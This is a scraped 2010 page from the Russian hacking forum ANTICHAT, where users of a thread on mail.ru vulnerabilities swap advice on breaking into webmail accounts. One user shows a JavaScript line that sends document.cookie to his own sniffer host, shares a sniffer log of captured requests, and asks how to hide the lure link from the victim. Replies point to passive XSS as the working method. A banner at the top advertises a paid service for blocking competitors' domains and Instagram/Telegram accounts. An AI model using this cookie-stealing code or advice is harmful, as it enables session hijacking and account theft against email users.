УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости Mail-сервис
Я люблю тебя mail: Вопросы и ответы

Страница 6 из 37

« Первая

Последняя »

Опции темы

Поиск в этой теме

Опции просмотра

#51

15.06.2010, 02:40

zlo12

Постоянный

Регистрация: 28.12.2007

Сообщений: 328

Провел на форуме:
3054717

Репутация: 170

Отправить сообщение для zlo12 с помощью ICQ

А eсли СИ нe поможeт?т.e. Пaроль тупо зaбыт. И брут нe бeрёт, что дeлaть?) вопрос тупой конeчно, но свой ящик 2 годa пытaюсь сломaть

#52

16.06.2010, 22:18

lmns

Постоянный

Регистрация: 21.02.2007

Сообщений: 568

Провел на форуме:
2954516

Репутация: 303

Цитата:

Сообщение от zlo12

Пaроль тупо зaбыт. И брут нe бeрёт, что дeлaть?) вопрос тупой конeчно, но свой ящик 2 годa пытaюсь сломaть

это на каком интересно сервере?

#53

16.06.2010, 23:21

zlo12

Постоянный

Регистрация: 28.12.2007

Сообщений: 328

Провел на форуме:
3054717

Репутация: 170

Цитата:

Сообщение от lmns

это на каком интересно сервере?

рамблер =(

#54

22.06.2010, 10:17

EoGeneo

Познающий

Регистрация: 29.08.2009

Сообщений: 75

Провел на форуме:
315861

Репутация: 5

Отправить сообщение для EoGeneo с помощью ICQ

Разве после двух лет он еще сам не уничтожился из-за бездействия.

#55

23.06.2010, 20:43

djdmitry

Новичок

Регистрация: 21.08.2009

Сообщений: 0

Провел на форуме:
1002

Репутация: 0

рамблер вообще какашка божья

#56

25.06.2010, 03:28

TambWolf

Новичок

Регистрация: 22.05.2009

Сообщений: 29

Провел на форуме:
336853

Репутация: 5

Установил себе Sniffer 4.1 Multi от Kanick. Начал тестировать, стало приходить: IP REFERER (ссылка с которой зашел чел) AGENT. Но вот данные QUERY оставались пустыми, т е куки не приходили.

Сначала отправил себе на почту ссылку в виде:

http://my*****.ru/nice/admin.gif?"+document.cookie;

зашел в лог посмотреть что там:

Код HTML:

HTML:
Запрос с win.mail.ru  — 24.06.2010 23:45
IP: **.***.247.180 (whois)
QUERY: " document.cookie
REFERER: http://win.mail.ru/cgi-bin/readmsg?id=12774086980000000510
AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.4) Gecko/20100611 Firefox/3.6.4 WebMoney Advisor

Если просто:

http://my*****.ru/nice/admin.gif , то все тоже самое лишь QUERY чисто пустая.

Посмотрев много видео и прочитав много статей, решил попробовать как все авторы рекомендовали: создал abc.gif ну и abc.img и вписал туда скрипт:

Код HTML:

HTML:

img=new Image(); img.src ="http://my*****.ru/nice/abc.gif?"+document.cookie;

Дальше как везде написано привязал к письму и отправил, однако даже при всем желании открыть в браузере эти файлы невозможно - сразу все идет на скачку, а gif, когда пытался просмотреть откликнулся ошибкой. Пытался всеми силами вложить эти файлы на mail.ru (мои файлы, мои фото), но ничего не вышло... Привязывал сразу к своему, но тогда получалось ровно то, что и в первом случае.

Может, кто знает, в чем проблема, может быть скрипт не так прописан, ссылку нужно по другому высылать.

#57

25.06.2010, 16:54

Unknown

Guest

Сообщений: n/a

Провел на форуме:
2417

Репутация: 3

первое , кража кук с помощью открытки не работает уже больше года

второе , чтобы украсть куки нужна пассивная XSS

#58

25.06.2010, 17:40

TambWolf

Новичок

Регистрация: 22.05.2009

Сообщений: 29

Провел на форуме:
336853

Репутация: 5

А как она выглядит, как искать и как отредактировать ссылку, если знаешь это пасивную уязвимость, и что такое активная уязвимость. Пожалуйста сделайте краткий обзор. Ну и ссылки на темы, которые на ваш взгяд более полезны...

#59

25.06.2010, 18:39

M_script

Новичок

Регистрация: 04.11.2004

Сообщений: 5

Провел на форуме:
4512

Репутация: 0

Цитата:

Сообщение от TambWolf

TambWolf said:
А как она выглядит, как искать и как отредактировать ссылку, если знаешь это пасивную уязвимость, и что такое активная уязвимость. Пожалуйста сделайте краткий обзор. Ну и ссылки на темы, которые на ваш взгяд более полезны...

Кратко:

XSS - Cross Site Scripting (межсайтовый скриптинг)

Активные - внедрение исполняемого кода в страницу

Пассивные - внедрение исполняемого кода в запрос

исполняемый код выполняется на локальной машине и чаще всего это JavaScript

Невнимательно смотрел, примеры пассивных XSS есть в этом разделе - /thread88986.html

Активки вряд ли найдешь в паблике.

#60

27.06.2010, 14:32

TambWolf

Новичок

Регистрация: 22.05.2009

Сообщений: 29

Провел на форуме:
336853

Репутация: 5

Нашел уязвимость, нашел сниффер в онлайне, настроил работает, однако сервер иногда не доступен. Поставил себе сниффер Sniffer 4.1 Multi от Kanick, все отправляет, однако человек очень долго будет видеть палевную ссылку, до тех пор пока не закроет. Как настроить редирект, чтобы он переходил на другую ссылку, пытался забраться в "изображение gif", а там:

GIF89a

не понятно, где, что изменять... Может, кто знает выход?

Страница 6 из 37

« Первая

Последняя »

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
PHP-Nuke Вопросы и ответы	gtym	PHP	8	05.04.2006 22:41
Комметарии и ответы на объявления в газете "Большой город", написанные ренсоном в про	Lolik	Болталка	1	04.12.2005 10:42
Я люблю тебя!	SladerNon	Болталка	17	26.05.2005 22:08

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход